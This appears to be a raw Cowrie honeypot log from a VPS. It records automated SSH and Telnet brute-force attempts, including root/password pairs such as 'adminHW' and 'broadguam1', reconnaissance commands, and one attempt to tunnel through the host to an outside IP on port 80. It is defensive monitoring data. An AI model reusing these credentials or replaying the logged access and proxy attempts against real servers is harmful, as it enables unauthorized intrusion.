{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45802,"dst_ip":"1.2.3.4","dst_port":22,"session":"a837a4c67d6c","protocol":"ssh","message":"New connection: 212.227.235.229:45802 (1.2.3.4:22) [session: a837a4c67d6c]","sensor":"my-vps","timestamp":"2025-08-28T23:42:10.074261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:42:10.075883Z","src_ip":"212.227.235.229","session":"a837a4c67d6c"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T23:42:10.161492Z","src_ip":"212.227.235.229","session":"a837a4c67d6c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","sensor":"my-vps","timestamp":"2025-08-28T23:42:10.334943Z","src_ip":"212.227.235.229","session":"a837a4c67d6c"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T23:42:10.335626Z","src_ip":"212.227.235.229","session":"a837a4c67d6c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","sensor":"my-vps","timestamp":"2025-08-28T23:42:10.422432Z","src_ip":"212.227.235.229","session":"a837a4c67d6c"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T23:42:10.423110Z","src_ip":"212.227.235.229","session":"a837a4c67d6c"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:42:20.074544Z","src_ip":"212.227.235.229","session":"a837a4c67d6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42133,"dst_ip":"1.2.3.4","dst_port":22,"session":"716f3eb851a2","protocol":"ssh","message":"New connection: 212.227.235.229:42133 (1.2.3.4:22) [session: 716f3eb851a2]","sensor":"my-vps","timestamp":"2025-08-28T23:42:58.631857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:42:58.636687Z","src_ip":"212.227.235.229","session":"716f3eb851a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:42:58.907839Z","src_ip":"212.227.235.229","session":"716f3eb851a2"}
{"eventid":"cowrie.login.success","username":"root","password":"110852*!111111","message":"login attempt [root/110852*!111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:42:59.994943Z","src_ip":"212.227.235.229","session":"716f3eb851a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:43:00.555010Z","src_ip":"212.227.235.229","session":"716f3eb851a2"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T23:43:00.555786Z","src_ip":"212.227.235.229","session":"716f3eb851a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:43:00.836682Z","src_ip":"212.227.235.229","session":"716f3eb851a2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:43:00.837749Z","src_ip":"212.227.235.229","session":"716f3eb851a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34740,"dst_ip":"1.2.3.4","dst_port":22,"session":"19c5057083f5","protocol":"ssh","message":"New connection: 212.227.125.160:34740 (1.2.3.4:22) [session: 19c5057083f5]","sensor":"my-vps","timestamp":"2025-08-28T23:43:22.969561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:43:24.211275Z","src_ip":"212.227.125.160","session":"19c5057083f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:43:24.212094Z","src_ip":"212.227.125.160","session":"19c5057083f5"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:43:31.074715Z","src_ip":"212.227.125.160","session":"19c5057083f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:43:34.483758Z","src_ip":"212.227.125.160","session":"19c5057083f5"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T23:43:34.484587Z","src_ip":"212.227.125.160","session":"19c5057083f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:43:36.047112Z","src_ip":"212.227.125.160","session":"19c5057083f5"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:43:36.076824Z","src_ip":"212.227.125.160","session":"19c5057083f5"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":38140,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3a8dc71882","protocol":"ssh","message":"New connection: 201.148.180.50:38140 (1.2.3.4:22) [session: 4f3a8dc71882]","sensor":"my-vps","timestamp":"2025-08-28T23:43:40.215362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:43:41.318270Z","src_ip":"201.148.180.50","session":"4f3a8dc71882"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:43:41.319033Z","src_ip":"201.148.180.50","session":"4f3a8dc71882"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51594,"dst_ip":"1.2.3.4","dst_port":22,"session":"02c747730b73","protocol":"ssh","message":"New connection: 217.72.205.35:51594 (1.2.3.4:22) [session: 02c747730b73]","sensor":"my-vps","timestamp":"2025-08-28T23:43:45.923388Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:43:45.924633Z","src_ip":"217.72.205.35","session":"02c747730b73"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:43:47.893433Z","src_ip":"201.148.180.50","session":"4f3a8dc71882"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:43:50.779684Z","src_ip":"201.148.180.50","session":"4f3a8dc71882"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T23:43:50.780369Z","src_ip":"201.148.180.50","session":"4f3a8dc71882"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:43:52.631554Z","src_ip":"201.148.180.50","session":"4f3a8dc71882"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:43:52.632821Z","src_ip":"201.148.180.50","session":"4f3a8dc71882"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:44:18.248055Z","src_ip":"212.227.235.229","session":"1b90bbfb728a"}
{"eventid":"cowrie.session.closed","duration":180.2191984653473,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:44:18.251661Z","src_ip":"212.227.235.229","session":"1b90bbfb728a"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":47522,"dst_ip":"1.2.3.4","dst_port":23,"session":"77ebde5cc81e","protocol":"telnet","message":"New connection: 79.124.8.120:47522 (1.2.3.4:23) [session: 77ebde5cc81e]","sensor":"my-vps","timestamp":"2025-08-28T23:44:47.132527Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:44:47.174517Z","src_ip":"79.124.8.120","session":"77ebde5cc81e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:44:47.193603Z","src_ip":"79.124.8.120","session":"77ebde5cc81e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":16941,"dst_ip":"1.2.3.4","dst_port":22,"session":"4622a30b8902","protocol":"ssh","message":"New connection: 212.227.125.160:16941 (1.2.3.4:22) [session: 4622a30b8902]","sensor":"my-vps","timestamp":"2025-08-28T23:45:28.836584Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:45:28.837648Z","src_ip":"212.227.125.160","session":"4622a30b8902"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":17227,"dst_ip":"1.2.3.4","dst_port":22,"session":"40fbf80416ba","protocol":"ssh","message":"New connection: 212.227.125.160:17227 (1.2.3.4:22) [session: 40fbf80416ba]","sensor":"my-vps","timestamp":"2025-08-28T23:45:28.949625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:45:28.950840Z","src_ip":"212.227.125.160","session":"40fbf80416ba"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T23:45:29.065058Z","src_ip":"212.227.125.160","session":"40fbf80416ba"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:45:29.410250Z","src_ip":"212.227.125.160","session":"40fbf80416ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T23:45:29.525210Z","session":"40fbf80416ba"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:46:38.949347Z","src_ip":"212.227.125.160","session":"40fbf80416ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:47:47.198437Z","src_ip":"79.124.8.120","session":"77ebde5cc81e"}
{"eventid":"cowrie.session.closed","duration":180.07026982307434,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:47:47.202726Z","src_ip":"79.124.8.120","session":"77ebde5cc81e"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.50.32","src_port":58150,"dst_ip":"1.2.3.4","dst_port":22,"session":"7062a3e8669b","protocol":"ssh","message":"New connection: 14.103.50.32:58150 (1.2.3.4:22) [session: 7062a3e8669b]","sensor":"my-vps","timestamp":"2025-08-28T23:48:34.717012Z"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:48:37.975362Z","src_ip":"14.103.50.32","session":"7062a3e8669b"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.50.32","src_port":58152,"dst_ip":"1.2.3.4","dst_port":22,"session":"09f8d7a11988","protocol":"ssh","message":"New connection: 14.103.50.32:58152 (1.2.3.4:22) [session: 09f8d7a11988]","sensor":"my-vps","timestamp":"2025-08-28T23:48:38.172134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:48:41.831869Z","src_ip":"14.103.50.32","session":"09f8d7a11988"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:48:41.832638Z","src_ip":"14.103.50.32","session":"09f8d7a11988"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:48:50.905368Z","src_ip":"14.103.50.32","session":"09f8d7a11988"}
